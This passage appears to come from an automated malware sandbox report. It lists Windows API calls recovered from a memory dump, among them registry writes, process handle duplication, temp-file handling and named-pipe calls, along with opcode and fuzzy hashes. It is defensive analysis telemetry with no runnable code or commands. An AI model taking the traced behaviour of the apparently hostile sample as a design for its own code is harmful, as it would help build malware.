                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE68
                                                            • HeapFree.KERNEL32(00000000,00000000,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE82
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                                            • String ID:
                                                            • API String ID: 316328430-0
                                                            • Opcode ID: a166f9145cddec188ee60c59731d1a6a2643be50ec57443320b65f4a59570987
                                                            • Instruction ID: 6debd9bf99fdd4dd127e1ade0697eb2521680b4d735c0bdafc535725b92d8477
                                                            • Opcode Fuzzy Hash: a166f9145cddec188ee60c59731d1a6a2643be50ec57443320b65f4a59570987
                                                            • Instruction Fuzzy Hash: AB217C7150020AFFCF108FA1EC08E9E7B79FB44318F104029FA01AA261DB35AE65FB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(04562555,00000000,00000000,0458C340,?,?,0456718B,04562555,00000000,04562555,0458C320), ref: 045745D0
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 045745DE
                                                            • wsprintfA.USER32 ref: 045745FA
                                                            • RegCreateKeyA.ADVAPI32(80000001,0458C320,00000000), ref: 04574612
                                                            • lstrlen.KERNEL32(?), ref: 04574621
                                                            • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0457462F
                                                            • RegCloseKey.ADVAPI32(?), ref: 0457463A
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04574649
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                                            • String ID:
                                                            • API String ID: 1575615994-0
                                                            • Opcode ID: 4e273cd57bd815fd15908f7fadf7949edc3b5784d368781b609cb5c1c762a437
                                                            • Instruction ID: 6a8e290cbb631bef802a93569396e543d0b998a40b229096addfe13f17f2d1e2
                                                            • Opcode Fuzzy Hash: 4e273cd57bd815fd15908f7fadf7949edc3b5784d368781b609cb5c1c762a437
                                                            • Instruction Fuzzy Hash: 27115B32100209FFDB015B95EC88EAA3B7DFB45715F101029FA05A6161DE7AAE58FB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OpenProcess.KERNEL32(00000040,00000000,?), ref: 045769F5
                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04576A13
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04576A1B
                                                            • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 04576A39
                                                            • GetLastError.KERNEL32 ref: 04576A4D
                                                            • RegCloseKey.ADVAPI32(?), ref: 04576A58
                                                            • CloseHandle.KERNEL32(00000000), ref: 04576A5F
                                                            • GetLastError.KERNEL32 ref: 04576A67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                                            • String ID:
                                                            • API String ID: 3822162776-0
                                                            • Opcode ID: 1279c040be775b5bbb6c69ba90f500a06a7682b4fec0d9337d0b1dc32abbc834
                                                            • Instruction ID: bd5a345dcd87044df41494073272d63db1148ce3382244788057a675e76a733f
                                                            • Opcode Fuzzy Hash: 1279c040be775b5bbb6c69ba90f500a06a7682b4fec0d9337d0b1dc32abbc834
                                                            • Instruction Fuzzy Hash: F8113C75200209EFDB018F60EC48B6A3B69FB44361F109029FA06D5250DF35ED24FB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 7d5745adb142f05ef8190d7bf01350e03f3ad04154ba1c7f4e1f22dcfd0b0464
                                                            • Instruction ID: d2f1708ab9cf62dfc930218c65c4a3e7b294d362469a763b077d5abd2217d1fe
                                                            • Opcode Fuzzy Hash: 7d5745adb142f05ef8190d7bf01350e03f3ad04154ba1c7f4e1f22dcfd0b0464
                                                            • Instruction Fuzzy Hash: F3A11C71E00209EFEF22AFD4DC44AAEBBB5FF44318F144829E512B2160D771AA59EF11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 045817DD
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 045817FA
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0458182D
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 04581858
                                                            • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 0458191A
                                                              • Part of subcall function 0457BAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04574A41,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000), ref: 0457BAED
                                                              • Part of subcall function 0457BAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0457BB10
                                                              • Part of subcall function 0457BAE4: memset.NTDLL ref: 0457BB1F
                                                            • lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 045818CB
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 045818FA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                                            • String ID:
                                                            • API String ID: 239510280-0
                                                            • Opcode ID: c19fcc5835c3368ce7266f936fa1e032cbc0d6df69b806ababd6ce8d3833593d
                                                            • Instruction ID: 3d06e0fee9966434ac504f987c081f0ee482e3273e158cc9e08691bd62f591d9
                                                            • Opcode Fuzzy Hash: c19fcc5835c3368ce7266f936fa1e032cbc0d6df69b806ababd6ce8d3833593d
                                                            • Instruction Fuzzy Hash: 6C41F835600609FBEB12AB64EC85F9E7BA8FB44704F10006DF505BA280EF75AD45FB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,?,?), ref: 0456A2D5
                                                            • lstrlen.KERNEL32(?,?,?), ref: 0456A2F3
                                                            • RtlAllocateHeap.NTDLL(00000000,73B76985,?), ref: 0456A31C
                                                            • memcpy.NTDLL(00000000,00000000,00000000), ref: 0456A333
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0456A346
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456A355
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 0456A3B9
                                                              • Part of subcall function 04569B15: RtlLeaveCriticalSection.NTDLL(?), ref: 04569B92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                                            • String ID:
                                                            • API String ID: 1635816815-0
                                                            • Opcode ID: ae76cc60e43973832f0855aa38b9c40dcbde9a127327e4c4bbe76846429af624
                                                            • Instruction ID: 9ef139ce3e6532602854c3ba92093cc82ea845dc300cd283c41fa2b5399cfb36
                                                            • Opcode Fuzzy Hash: ae76cc60e43973832f0855aa38b9c40dcbde9a127327e4c4bbe76846429af624
                                                            • Instruction Fuzzy Hash: 3841AE31600219EFDB21AFA8DC44A9E7BA9FF05354F154468F806B7260DB71EE54FB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,04564214,00000000,00000001,?,00000001,?), ref: 04576B08
                                                            • lstrlen.KERNEL32(?), ref: 04576B18
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04576B4C
                                                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 04576B77
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04576B96
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04576BF7
                                                            • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 04576C19
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Allocatelstrlenmemcpy$Free
                                                            • String ID:
                                                            • API String ID: 3204852930-0
                                                            • Opcode ID: f03411dddbc5f51c936ab92ed8007817be6b81bc2bc6adcff43ed5374f6c2eb2
                                                            • Instruction ID: 2bb4fed7a63fcb39253775b1a4f806e05f46011ad4de396c4b87642fc563cd1b
                                                            • Opcode Fuzzy Hash: f03411dddbc5f51c936ab92ed8007817be6b81bc2bc6adcff43ed5374f6c2eb2
                                                            • Instruction Fuzzy Hash: DD4125B190060AEFDB10DF95EC80AAE7FB9FF04358F144469E914A7211E731AA54AFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlImageNtHeader.NTDLL ref: 04575148
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 0457518B
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 045751A6
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 045751FC
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 04575257
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 04575265
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04575270
                                                              • Part of subcall function 0456C547: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0456C55B
                                                              • Part of subcall function 0456C547: memcpy.NTDLL(00000000,0456F989,?,?,-00000005,?,0456F989,00000001,00000000,-00000005,00000001), ref: 0456C584
                                                              • Part of subcall function 0456C547: RegSetValueExA.ADVAPI32(?,00000001,00000000,00000003,00000000,?), ref: 0456C5AD
                                                              • Part of subcall function 0456C547: RegCloseKey.ADVAPI32(?,?,0456F989,00000001,00000000,-00000005,00000001), ref: 0456C5D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                                            • String ID:
                                                            • API String ID: 3181710096-0
                                                            • Opcode ID: e264e40758e478af1c18b1914fe6b939e45b10a916c01878d479c8edd8527ef1
                                                            • Instruction ID: ec46178e0cf66741083d660df0e6c7fdfc1bd618f82ca8c72dfdda0d712e1db6
                                                            • Opcode Fuzzy Hash: e264e40758e478af1c18b1914fe6b939e45b10a916c01878d479c8edd8527ef1
                                                            • Instruction Fuzzy Hash: D6415C72600209FFEB219E65E885F6E37A8FB40795F144438FA46AA540EB35ED44FA60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(0458C00C), ref: 04562BAB
                                                            • lstrcpy.KERNEL32(00000000), ref: 04562BE7
                                                              • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
                                                              • Part of subcall function 04574B63: mbstowcs.NTDLL ref: 04574B8E
                                                            • GetLastError.KERNEL32(00000000), ref: 04562C76
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04562C8D
                                                            • InterlockedDecrement.KERNEL32(0458C00C), ref: 04562CA4
                                                            • DeleteFileA.KERNEL32(00000000), ref: 04562CC5
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04562CD5
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                                                            • String ID:
                                                            • API String ID: 908044853-0
                                                            • Opcode ID: 9f63c65d2f389b96b89f30253fa67f8f6d1d74ed2ddcc5ad41a85c3d39dae9b2
                                                            • Instruction ID: b70d1c86349251d3670dbfa5e2c69754a11024e9c831371fd2dcafd8f1dde739
                                                            • Opcode Fuzzy Hash: 9f63c65d2f389b96b89f30253fa67f8f6d1d74ed2ddcc5ad41a85c3d39dae9b2
                                                            • Instruction Fuzzy Hash: 3031F636900115FBEB11AFA1D844AAD7BB8FF44745F118069F906AB140DA78AE44FB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 04571887
                                                            • StrTrimA.SHLWAPI(?,?), ref: 045718A5
                                                            • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 0457190E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 0457192F
                                                            • DeleteFileA.KERNEL32(?,00003219), ref: 04571951
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04571960
                                                            • HeapFree.KERNEL32(00000000,?,00003219), ref: 04571978
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 1078934163-0
                                                            • Opcode ID: b1a6928512658f44ed9849edf27c4a69542ab051f3a997df21f481d161abe7d4
                                                            • Instruction ID: 119f934a6521e5e195529c9249d91832ce8dc16d5786a91ce4a96a31d8e8b39a
                                                            • Opcode Fuzzy Hash: b1a6928512658f44ed9849edf27c4a69542ab051f3a997df21f481d161abe7d4
                                                            • Instruction Fuzzy Hash: 2431AF32604606EFE311AB54EC44F6A77ECFB45B04F044428FA44B7291DF69FD0AABA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,04562DC7), ref: 0457DE3C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0457DE51
                                                            • memset.NTDLL ref: 0457DE5E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,0000001A,?,?,04562DC6,?,?), ref: 0457DE7B
                                                            • memcpy.NTDLL(?,?,04562DC6,?,0000001A,?,?,04562DC6,?,?), ref: 0457DE9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Allocate$Freememcpymemset
                                                            • String ID: chun
                                                            • API String ID: 2362494589-3058818181
                                                            • Opcode ID: 3d181ffb816584ab8b808ada941064c3e2387ff14faa2e94381c9e885ae5fd7f
                                                            • Instruction ID: 21a44f1537d87f47cf8793a7407acae1a070dbd9170fc8a689656711ad15cc42
                                                            • Opcode Fuzzy Hash: 3d181ffb816584ab8b808ada941064c3e2387ff14faa2e94381c9e885ae5fd7f
                                                            • Instruction Fuzzy Hash: B4317C71500606EFD7219F6AE840E66BBF9FF54314F014429E949AB260DB30FD49EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            • lstrlen.KERNEL32(00000000,?,00000F00), ref: 04563EEA
                                                              • Part of subcall function 0456B869: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,04563F0E,?,00000000,000000FF,?,00000F00), ref: 0456B87A
                                                              • Part of subcall function 0456B869: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,04563F0E,?,00000000,000000FF,?,00000F00), ref: 0456B881
                                                              • Part of subcall function 0456B869: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0456B893
                                                              • Part of subcall function 0456B869: _snprintf.NTDLL ref: 0456B8B9
                                                              • Part of subcall function 0456B869: _snprintf.NTDLL ref: 0456B8ED
                                                              • Part of subcall function 0456B869: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0456B90A
                                                            • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 04563F84
                                                            • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 04563FA1
                                                            • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 04563FA9
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 04563FB8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                                            • String ID: s:
                                                            • API String ID: 2960378068-2363032815
                                                            • Opcode ID: 0bcc2df0407b5382a7517fca3a605d232fe105c072188aaf8b6f105902693b68
                                                            • Instruction ID: 792b06e4b260d05eb77e84a2406f0e3f5cd9dc662631ac393845c8f2b7555a27
                                                            • Opcode Fuzzy Hash: 0bcc2df0407b5382a7517fca3a605d232fe105c072188aaf8b6f105902693b68
                                                            • Instruction Fuzzy Hash: 57314F72900246EFDB10ABE9DC84F9EBBBCFB48214F000559E505E3281EE78A904AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(045647C4,00000000,00000000,?,?,?,045647C4,00000035,00000000,-00000005,00000000), ref: 0456A727
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0456A73D
                                                            • memcpy.NTDLL(00000010,045647C4,00000000,?,?,045647C4,00000035,00000000), ref: 0456A773
                                                            • memcpy.NTDLL(00000010,00000000,00000035,?,?,045647C4,00000035), ref: 0456A78E
                                                            • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0456A7AC
                                                            • GetLastError.KERNEL32(?,?,045647C4,00000035), ref: 0456A7B6
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,045647C4,00000035), ref: 0456A7D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                                            • String ID:
                                                            • API String ID: 2237239663-0
                                                            • Opcode ID: 6ba5d256aa0a6a7022ec88277aaab529979630967d1ac2d2059f8aef9d1635eb
                                                            • Instruction ID: ddde105c9698991a05b4eaaba8a6bf22228ed8a490a4fab701732cd23bfe8393
                                                            • Opcode Fuzzy Hash: 6ba5d256aa0a6a7022ec88277aaab529979630967d1ac2d2059f8aef9d1635eb
                                                            • Instruction Fuzzy Hash: 25318036500309EFDB21DF65D884A9BBBB8FB45751F104429F906E3211E634EE58EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 0457CE00
                                                            • lstrcmpiW.KERNEL32(00000000,?,73BCF710,?,?,?,04573066), ref: 0457CE38
                                                            • lstrcmpiW.KERNEL32(?,?,?,?,?,04573066), ref: 0457CE4D
                                                            • lstrlenW.KERNEL32(?,?,?,?,04573066), ref: 0457CE54
                                                            • CloseHandle.KERNEL32(?,?,?,?,04573066), ref: 0457CE7C
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,04573066), ref: 0457CEA8
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0457CEC6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                                            • String ID:
                                                            • API String ID: 1496873005-0
                                                            • Opcode ID: 457b0885b2a3faff318d69c9cc8f715e66d977fa2c05c13221cab1d33f5308bf
                                                            • Instruction ID: 3179411cff7e7a91c9a95aa9e330b6c14237558ea2d5aa37b910dcfd09585adb
                                                            • Opcode Fuzzy Hash: 457b0885b2a3faff318d69c9cc8f715e66d977fa2c05c13221cab1d33f5308bf
                                                            • Instruction Fuzzy Hash: 6A211B72900205EFEB229FB5EC84E6B77BCFF04644B04152DE906E2101EF35F909AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(0456717C,00000000,0458C320,0458C340,?,?,0456717C,04562555,0458C320), ref: 0457EE5F
                                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0457EE75
                                                            • lstrlen.KERNEL32(04562555,?,?,0456717C,04562555,0458C320), ref: 0457EE7D
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0457EE89
                                                            • lstrcpy.KERNEL32(0458C320,0456717C), ref: 0457EE9F
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0456717C,04562555,0458C320), ref: 0457EEF3
                                                            • HeapFree.KERNEL32(00000000,0458C320,?,?,0456717C,04562555,0458C320), ref: 0457EF02
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                                            • String ID:
                                                            • API String ID: 1531811622-0
                                                            • Opcode ID: 409f5ab94717af22badedcd6d96181631675e772389f219c4067534fdbcccb7d
                                                            • Instruction ID: 5d3b39497bcbe2e9ed5e15a34d2346c03f4bafccba8c9b6fd29b00d2518ecd65
                                                            • Opcode Fuzzy Hash: 409f5ab94717af22badedcd6d96181631675e772389f219c4067534fdbcccb7d
                                                            • Instruction Fuzzy Hash: EA21B331104345EFEB224F69AC44F6A7F6AFB46350F1440A9F8946B252CA75AC09EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,04562273,00000000), ref: 0456C493
                                                              • Part of subcall function 0457AC39: lstrcpy.KERNEL32(-000000FC,00000000), ref: 0457AC73
                                                              • Part of subcall function 0457AC39: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,0456C4A0,?,?,00000000,?,04562273,00000000), ref: 0457AC85
                                                              • Part of subcall function 0457AC39: GetTickCount.KERNEL32 ref: 0457AC90
                                                              • Part of subcall function 0457AC39: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,0456C4A0,?,?,00000000,?,04562273,00000000), ref: 0457AC9C
                                                              • Part of subcall function 0457AC39: lstrcpy.KERNEL32(00000000), ref: 0457ACB6
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpy.KERNEL32(00000000), ref: 0456C4CE
                                                            • wsprintfA.USER32 ref: 0456C4E1
                                                            • GetTickCount.KERNEL32 ref: 0456C4F6
                                                            • wsprintfA.USER32 ref: 0456C50B
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                                            • String ID: "%S"
                                                            • API String ID: 1152860224-1359967185
                                                            • Opcode ID: e285e326f67aaadbe7fac6c3826e98dfb54a201b6aa3d548063bdbc403e23a04
                                                            • Instruction ID: 67f1516bbdc95e5294944b17daeedb4fa76592bef76f479ea7c2f99176d775c2
                                                            • Opcode Fuzzy Hash: e285e326f67aaadbe7fac6c3826e98dfb54a201b6aa3d548063bdbc403e23a04
                                                            • Instruction Fuzzy Hash: E411B172900316AFE2117B65AC84D5B379CFFA4A14F05401CF94AB7201DE79FC05ABB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,045777BB,?), ref: 04568DF5
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,045777BB,?,00000000,00000000,00000000,00000000,00000000), ref: 04568E68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 2078930461-0
                                                            • Opcode ID: 9cc0e4b6bca51fbc6a579e1b5d10abc7a038e5ff730576f6d768868e4111887a
                                                            • Instruction ID: cdf90504212ce5c21cdb3f1bf2a9e9445e559c271e4d882c243faf4682160c8b
                                                            • Opcode Fuzzy Hash: 9cc0e4b6bca51fbc6a579e1b5d10abc7a038e5ff730576f6d768868e4111887a
                                                            • Instruction Fuzzy Hash: B411EF31141319FBE7312A21EC4CF6F3F1DFB81764F100528F602A6192EA6AAC58F7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
